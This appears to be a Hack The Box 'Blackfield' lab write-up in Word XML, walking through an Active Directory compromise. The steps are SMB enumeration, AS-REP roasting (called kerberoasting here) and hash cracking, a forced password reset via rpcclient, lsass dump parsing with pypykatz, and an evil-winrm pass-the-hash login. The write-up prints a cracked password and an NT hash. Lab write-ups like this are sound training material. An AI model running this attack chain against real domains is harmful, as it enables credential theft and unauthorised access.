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Blackfield</w:t>
      </w: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Hard</w:t>
      </w:r>
    </w:p>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Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:pageBreakBefore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ageBreakBefore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Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">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step in any hack the box machine is to start off with an nmap scan. I always use an aggressive scan to start off followed by a pipe into “tee” which will print the output on the screen and simultaneously place the output from nmap into a named file. Doing this shows a few ports are open. We have ports 53, 88, 135, 139, 389, 445, 593, and 3268. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">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727200"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="18"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81025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Nmap -A 10.10.10.192 | tee nmap.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">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ports available, it looks like our first step is to enumerate SMB. Specifically, we should use smbclient, smbmap, crackmapexec, and maybe rpcclient. </w:t>
      </w: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Enumeration : smb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">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Utilizing smbclient for a quick anonymous share looking, we find there are a few visible shares. To know which we can or cannot view, I used smbmap. This entire step could be completed with crackmapexec instead. I will list both methods to show their equivalence.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">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Smbclient &amp; smbmap</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76900" cy="2619375"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="27"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567690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Smbclient -L 10.10.10.192</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384300"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1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1025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Smbmap -H 10.10.10.192 -u ‘anonymous’ -p ‘’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">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498600"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="10"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81025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Crackmapexec smb 10.10.10.192 -u ‘anonymous’ -p ‘’ --shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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above scripts use the username “anonymous” and a null password. Without these, smbmap and crackmapexec will not work and present a failed authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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results of our smb scans, we see “IPC$” and “profiles$” are readable. IPC usually contains nothing useful for initial footholds, thus we will go to “profiles$” first. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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access the share named”profiles$”, I use smbclient. Doing so gets us a smb instance. Looking into this share, we find a long list of usernames that are all directories on their own. It would take too long to go through all of these, so the next best step is to grab the usernames and put them into a username file. Additionally, we may want to mount this share to further investigate their contents. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">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29275" cy="3143250"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="26"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562927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Smbclient //10.10.10.192/profiles$</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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easily grab and enumerate the directories, I am going to mount the “profiles$” share onto my local machine. First, I create a new directory in the /mnt directory called “blackfield.” Then I mount the share with the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">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48175" cy="1343025"/>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44817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Mkdir /mnt/blackfield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Mount -t cifs //10.10.10.192/profiles$ /mnt/blackfield</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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noted earlier, these directories are usernames. Due to this, it is is a good idea to grab all of them and place them into a username file. To quickly do this, we can list the directories within this mount and pipe that output into a user file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">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19425" cy="381000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="15"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30194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 &gt; /root/htb/blackfield/users.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">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out which users are valid on this machine based on our wordlist, we can use a script called “kerbrute.” This script will take the username list along with basic domain information and test them against AD. If a username is correct, it will report it back to us. Given this information, we should then look into their respective mounted directories or use an impacket script. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">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Utilizing kerbrute, we get the following</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">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2159000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="17"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81025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Kerbrute userenum --dc 10.10.10.192 -d blackfield -o enumusers.txt users.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">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find the users audit2020, support, and svc_backup are valid within the AD environment. The first step I take after finding these is going into their mounted directories from earlier. Doing so reveals nothing. The next best thing to do is to use some impacket scripts. The one we are interested in is “GetNPUsers” which can work with only a username and will perform a kerberoasting attack. Grabbing this script and running it, we get a hit with user “support.” </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">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927100"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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81025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Python3 GetNPUsers.py -usersfile confirmedusers.txt -dc-ip 10.10.10.192 blackfield/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">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GetNPUsers.py has successfully performed a kerberoasting attack and given us back a kerb5asrep hash for us to crack. We can crack this hash by taking it over to hashcat or JTR (John the Ripper). I am going to be using hashcat. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">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starting hashcat, we need to know the hash ID of our particular hash. We find this by looking at the header of the hash we previously found and compare that with entries in hashcat. This will then provide us with hashcat’s hash id number to then use for cracking. We perform this below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">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29050" cy="1152525"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="11"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8290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Hashcat --example-hashes | grep -i asrep -B2</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">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command above will grab the hash affiliated with “asrep” and show us the ID or mode number for this particular hash. Now that we have the hash id, we can use hashcat to figureo out the password of the support user. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">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67125" cy="390525"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="21"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36671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85975" cy="466725"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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08597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Hashcat -m 18200 hash.txt /opt/rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">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find the password for user “support” is “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#00^BlackKnight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this with crackmapexec for winrm, we find we cannot log in. Due to this, our next best guess is to go back to smb enumeration, specifically smb shares. Below I show a crackmapexec share numeration and we see there are a couple more shares to view. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">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536700"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="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81025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crackmapexec smb 10.10.10.192 -u "support" -p "#00^BlackKnight" --shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">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results from crackmapexec logging in as the support user, we should look into the new shares available to us. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">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through the shares, we find nothing useful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">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over to a different enumeration script, we could potentially find what the support user’s capabilities are. Here, we are going to use Bloodhound remotely. Typically Bloodhound is ran while on the host, but there is a python script which will allow us to execute it simply from our own machine. All we need is to supply it with a valid username and password along with basic domain information. Lucky for us, we have all of this. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">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perform the bloodhound scan, execute the following.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">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304800"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="23"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58102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Python3 bloodhound.py -u “support” -p “#00^BlackKnight” -ns 10.10.10.192 -d blackfield.local -c all</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">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 represents the name server. “D” is the domain. “C” is the collection method we want bloodhound to run. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">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Bloodhound leaves some json files on our machine where bloodhound was executed. These can be enumerated utilizing Bloodhound’s counterpart called “neo4j”. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">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67000" cy="371475"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="16"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6670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Neo4j console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(may need to be ran as sudo)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">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neo4j is set up, we run bloodhound. I need to run bloodhound in no-sandbox mode since I am root. Once BloodHound is running, we can import the collected json files in and start analyzing. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">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19275" cy="514350"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="1"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181927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00525" cy="361950"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="9"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2005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Neo4j console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./BloodHound --no-sandbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">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upload the json files, we drag and drop them into the BloodHound console. From there I search “support” for the support user, right click the node that is generated and select “mark user as owned.” From there, we want to see what permissions the support user has. On the Node Info tab, we can scroll down and find a section called “First Degree Object Control.” Clicking this shows us a new graph showing that the support user can change the password of the audit2020 user. Since we know audit2020 is a valid user, this is where we need to go. Additionally, since we know we can log into rpcclient with the support user, we will have to change the password from there. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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3136900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="14"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810250" cy="3136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7">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online how to change a password through rpcclient, I came across this article.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>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https://malicious.link/post/2017/reset-ad-user-password-with-linux/</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out what the article showed, I was able to successfully alter audit2020’s password. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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86100" cy="342900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="5"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30861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0000" cy="152400"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="24"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38100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Setuserinfo2 audit2020 23 Password1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">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command, we are resetting audo2020’s password to “Password1”. The article links to a MSDN page describing where the “23” came from. Going through this, we find “23” is associated with “UserInternal4Information” which, when we look up, we acquire a description, “The SAMPR_USER_INTERNAL4_INFORMATION structure holds all attributes of a user, along with an encrypted password.” So what this rpcclient command is doing is changing the password as stated before. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">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these new creds to crackmapexec, we find we still do not have winrm access. However, checking smb we find we now have access to the “forensic” share. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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524000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="12"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8102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Crackmapexec smb 10.10.10.192 -u audit2020 -p Password1 --shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">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into this share with smbclient, we find there are a couple other subdirectories we can access. To make enumeration easier, I am going to mount this share to my local drive with the mount command. Yet, we first need to unmount the previous share from earlier. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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76675" cy="1533525"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="8"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387667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Smbclient -U audit2020 //10.10.10.192/forensic=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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310921"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="7"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5810250" cy="310921"/>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ageBreakBefore w:val="0"/>
              <w:widowControl w:val="0"/>
              <w:spacing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6">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Mount -t cifs -o ‘username=audit2020,password=Password1’ //10.10.10.192/forensic /mnt/blackfield</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">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Investigating the files here, I find a new user called “Ipwn3dYourCompany” who is an administrator. In the “memory_analysis” directory, we are presented with a variety of zip files. One of these files is called “lsass.zip.” This file is special because lsass is the file mimikatz pulls plaintext passwords from. Taking this file over to our local drive and unzipping it gives us a file called “lsass.DMP.” To open this new file, we are going to use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pypykatz</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Using pypykatz, we find the NT hash of “svc_backup.” The administrator NT hash is there too, but I doubt that will work. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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76300" cy="342900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="13"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8763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28925" cy="342900"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="22" name="image25.png"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="image25.png"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId31"/>
                          <a:srcRect b="0" l="0" r="0" t="0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="28289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Pypykatz lsa minidump lsass.DMP</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762375" cy="828675"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="29" name="image26.png"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="image26.png"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId32"/>
                          <a:srcRect b="0" l="0" r="0" t="0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="37623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pypykatz is not limited to lsa. It has other options for other files as well</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">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Attempting the administrator hash, we get nothing. Trying svc_backup and its hash, we get a positive on smb. Taking it over to winrm, we find we have access and thus, finally, a shell on the box. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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014524"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="28" name="image29.png"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="image29.png"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId33"/>
                          <a:srcRect b="0" l="0" r="0" t="0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5810250" cy="101452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9">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know winrm works, I am going to use “evil-winrm” to get a remote session to the blackfield box. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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381000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="25" name="image28.png"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="image28.png"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId34"/>
                          <a:srcRect b="0" l="0" r="0" t="0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="58102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evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">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ind w:left="0" w:firstLine="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2">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E3">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step we always take in a box is to check for system information. Unfortunately, we do not have permission to do that with the svc_backup user. Next step would be to look at permissions. Doing this, I see we have a couple “Se” permissions. The one that is the most eye-catching is “SeBackupPrivilege.” </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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43525" cy="6743700"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="20" name="image20.png"/>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="image20.png"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId35"/>
                          <a:srcRect b="0" l="0" r="0" t="0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5343525" cy="6743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8">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ind w:left="0" w:firstLine="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C">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in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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winrm but does not work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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Tried smb to find support has more shares. Enumerated and showed nothing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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Attempting bloodhound remotely</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>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python3 bloodhound.py -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all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4">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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bloodhound, we do not see any path to admin. We do have permission to force change user “audit2020” password so we are going to do that with rpcclient</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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Rpcclient</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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Rpcclient -U support 10.10.10.192</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F7">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>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Setuserinfo2 Audit2020 23 ‘new-pass’</w:t>
      </w:r>
    </w:p>
